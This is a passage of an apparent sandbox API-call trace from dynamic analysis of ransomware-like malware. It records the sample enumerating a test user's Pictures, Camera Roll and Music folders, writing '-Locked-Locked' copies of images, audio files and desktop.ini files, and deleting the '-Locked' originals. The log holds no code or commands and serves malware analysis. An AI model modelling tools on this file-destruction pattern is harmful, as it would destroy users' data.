SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.865] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\QNrRte.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\qnrrte.png-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.866] GetFileType (hFile=0x49c) returned 0x1 [0306.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.866] GetFileType (hFile=0x49c) returned 0x1 [0306.868] CloseHandle (hObject=0x49c) returned 1 [0306.868] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\QNrRte.png-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\QNrRte.png-Locked", lpFilePart=0x0) returned 0x30 [0306.869] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\QNrRte.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\qnrrte.png-locked")) returned 1 [0306.870] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\soGL3VvH3.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\soGL3VvH3.jpg-Locked-Locked", lpFilePart=0x0) returned 0x3a [0306.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.870] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\soGL3VvH3.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\sogl3vvh3.jpg-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.870] GetFileType (hFile=0x49c) returned 0x1 [0306.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.870] GetFileType (hFile=0x49c) returned 0x1 [0306.932] CloseHandle (hObject=0x49c) returned 1 [0306.933] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\soGL3VvH3.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\soGL3VvH3.jpg-Locked", lpFilePart=0x0) returned 0x33 [0306.933] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\soGL3VvH3.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\sogl3vvh3.jpg-locked")) returned 1 [0306.934] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\tQi0H8EC.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\tQi0H8EC.jpg-Locked-Locked", lpFilePart=0x0) returned 0x39 [0306.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.934] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\tQi0H8EC.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\tqi0h8ec.jpg-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.935] GetFileType (hFile=0x49c) returned 0x1 [0306.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.935] GetFileType (hFile=0x49c) returned 0x1 [0306.936] CloseHandle (hObject=0x49c) returned 1 [0306.937] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\tQi0H8EC.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\tQi0H8EC.jpg-Locked", lpFilePart=0x0) returned 0x32 [0306.937] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\tQi0H8EC.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\tqi0h8ec.jpg-locked")) returned 1 [0306.938] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\u6iPBC1t5.gif-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\u6iPBC1t5.gif-Locked-Locked", lpFilePart=0x0) returned 0x3a [0306.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.938] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\u6iPBC1t5.gif-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\u6ipbc1t5.gif-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.938] GetFileType (hFile=0x49c) returned 0x1 [0306.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.938] GetFileType (hFile=0x49c) returned 0x1 [0306.940] CloseHandle (hObject=0x49c) returned 1 [0306.940] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\u6iPBC1t5.gif-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\u6iPBC1t5.gif-Locked", lpFilePart=0x0) returned 0x33 [0306.940] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\u6iPBC1t5.gif-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\u6ipbc1t5.gif-locked")) returned 1 [0306.941] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Uy1att05vGLsri.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Uy1att05vGLsri.png-Locked-Locked", lpFilePart=0x0) returned 0x3f [0306.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.941] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Uy1att05vGLsri.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\uy1att05vglsri.png-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.942] GetFileType (hFile=0x49c) returned 0x1 [0306.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.942] GetFileType (hFile=0x49c) returned 0x1 [0306.943] CloseHandle (hObject=0x49c) returned 1 [0306.944] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Uy1att05vGLsri.png-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Uy1att05vGLsri.png-Locked", lpFilePart=0x0) returned 0x38 [0306.944] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Uy1att05vGLsri.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\uy1att05vglsri.png-locked")) returned 1 [0306.944] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VVbwcj.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VVbwcj.jpg-Locked-Locked", lpFilePart=0x0) returned 0x37 [0306.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.944] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VVbwcj.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\vvbwcj.jpg-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.945] GetFileType (hFile=0x49c) returned 0x1 [0306.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.945] GetFileType (hFile=0x49c) returned 0x1 [0306.947] CloseHandle (hObject=0x49c) returned 1 [0306.947] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VVbwcj.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VVbwcj.jpg-Locked", lpFilePart=0x0) returned 0x30 [0306.947] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VVbwcj.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\vvbwcj.jpg-locked")) returned 1 [0306.948] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\X0o USyk.gif-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\X0o USyk.gif-Locked-Locked", lpFilePart=0x0) returned 0x39 [0306.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.948] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\X0o USyk.gif-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\x0o usyk.gif-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.948] GetFileType (hFile=0x49c) returned 0x1 [0306.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.949] GetFileType (hFile=0x49c) returned 0x1 [0306.950] CloseHandle (hObject=0x49c) returned 1 [0306.950] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\X0o USyk.gif-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\X0o USyk.gif-Locked", lpFilePart=0x0) returned 0x32 [0306.951] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\X0o USyk.gif-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\x0o usyk.gif-locked")) returned 1 [0306.952] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\xDBEu.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\xDBEu.png-Locked-Locked", lpFilePart=0x0) returned 0x36 [0306.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.952] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\xDBEu.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\xdbeu.png-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.952] GetFileType (hFile=0x49c) returned 0x1 [0306.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.952] GetFileType (hFile=0x49c) returned 0x1 [0306.954] CloseHandle (hObject=0x49c) returned 1 [0306.955] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\xDBEu.png-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\xDBEu.png-Locked", lpFilePart=0x0) returned 0x2f [0306.955] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\xDBEu.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\xdbeu.png-locked")) returned 1 [0306.956] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\YSfbkFfVqb.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\YSfbkFfVqb.jpg-Locked-Locked", lpFilePart=0x0) returned 0x3b [0306.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.956] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\YSfbkFfVqb.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ysfbkffvqb.jpg-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.956] GetFileType (hFile=0x49c) returned 0x1 [0306.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.956] GetFileType (hFile=0x49c) returned 0x1 [0306.958] CloseHandle (hObject=0x49c) returned 1 [0306.958] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\YSfbkFfVqb.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\YSfbkFfVqb.jpg-Locked", lpFilePart=0x0) returned 0x34 [0306.958] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\YSfbkFfVqb.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ysfbkffvqb.jpg-locked")) returned 1 [0306.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0306.959] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", lpFilePart=0x0) returned 0x2a [0306.959] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\", lpFilePart=0x0) returned 0x2b [0306.959] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x35af0875, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35af0875, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0306.960] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x35af0875, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35af0875, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0306.960] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35ae3158, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35ae3158, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35ae3158, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0306.960] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0306.960] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0306.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0306.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0306.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0306.961] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", lpFilePart=0x0) returned 0x2a [0306.961] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\", lpFilePart=0x0) returned 0x2b [0306.961] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x35af0875, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35af0875, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0306.961] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x35af0875, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35af0875, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0306.963] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35ae3158, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35ae3158, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35ae3158, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0306.964] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35ae3158, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35ae3158, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35ae3158, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 0 [0306.964] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0306.964] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0306.964] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0306.964] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x44 [0306.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0306.964] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.965] GetFileType (hFile=0x49c) returned 0x1 [0306.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0306.965] GetFileType (hFile=0x49c) returned 0x1 [0306.967] CloseHandle (hObject=0x49c) returned 1 [0306.967] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini-Locked", lpFilePart=0x0) returned 0x3d [0306.967] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\desktop.ini-locked")) returned 1 [0306.968] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", nBufferLength=0x105, lpBuffer=0x1aed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", lpFilePart=0x0) returned 0x2a [0306.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af160) returned 1 [0306.968] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll"), fInfoLevelId=0x0, lpFileInformation=0x1af1e0 | out: lpFileInformation=0x1af1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x375d244c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x375d244c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0306.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0306.969] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll")) returned 0 [0307.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.010] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music", lpFilePart=0x0) returned 0x1b [0307.010] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpFilePart=0x0) returned 0x1c [0307.010] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3513d0c1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3513d0c1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.011] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3513d0c1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3513d0c1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.011] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cca839, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34cca839, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cca839, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0307.011] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cd457f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34cd457f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cd457f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FliceLJAYp8j0i3clDA.m4a-Locked", cAlternateFileName="FLICEL~2.M4A")) returned 1 [0307.011] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cdbabe, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34cdbabe, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cdbabe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hc-ff1Mym_xG 8y7.wav-Locked", cAlternateFileName="HC-FF1~2.WAV")) returned 1 [0307.012] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34ce5622, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34ce5622, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34ce5622, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PZBiyuFJk P66leN.wav-Locked", cAlternateFileName="PZBIYU~2.WAV")) returned 1 [0307.012] FindNextFileW 